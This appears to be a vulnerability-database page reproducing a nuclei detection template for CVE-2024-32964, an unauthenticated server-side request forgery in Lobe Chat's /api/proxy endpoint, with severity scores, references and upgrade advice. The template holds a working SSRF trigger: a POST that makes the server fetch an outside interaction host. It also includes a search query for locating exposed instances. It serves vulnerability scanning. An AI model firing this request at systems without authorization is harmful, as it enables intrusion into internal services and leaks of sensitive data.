Lucene search
K

Lobe Chat <= v0.150.5 - Server-Side Request Forgery

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 45 Views

Lobe Chat v0.150.5 - SSRF vulnerabilit

Related
Refs
Code
id: CVE-2024-32964

info:
  name: Lobe Chat <= v0.150.5 - Server-Side Request Forgery
  author: s4e-io
  severity: critical
  description: |
    Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.
  impact: |
    Unauthenticated attackers can force the server to make arbitrary requests, potentially accessing internal services and sensitive data.
  remediation: |
    Update Lobe Chat to version 0.150.6 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-32964
    - https://github.com/lobehub/lobe-chat/commit/465665a735556669ee30446c7ea9049a20cc7c37
    - https://github.com/lobehub/lobe-chat/security/advisories/GHSA-mxhq-xw3g-rphc
    - https://vulert.com/vuln-db/CVE-2024-32964
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H
    cvss-score: 9
    cve-id: CVE-2024-32964
    cwe-id: CWE-918
    epss-score: 0.52683
    epss-percentile: 0.98838
  metadata:
    verified: true
    max-request: 2
    vendor: lobehub
    product: lobe-chat
    fofa-query: icon_hash="1975020705"
  tags: cve,cve2024,lobechat,ssrf,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /welcome HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "lobechat")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /api/proxy HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain

        http://oast.me

    matchers:
      - type: word
        part: response
        words:
          - "<h1> Interactsh Server </h1>"
# digest: 4a0a0047304502204220e9efafbddc0bf002dba3a003f531ecedb207d298bb21763ab26a53c38b6b022100b804cc92e7778343f5507946c45e663fe6239bbf72bc670905d9f8e2ecba4113:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19
EPSS0.52683
SSVC
45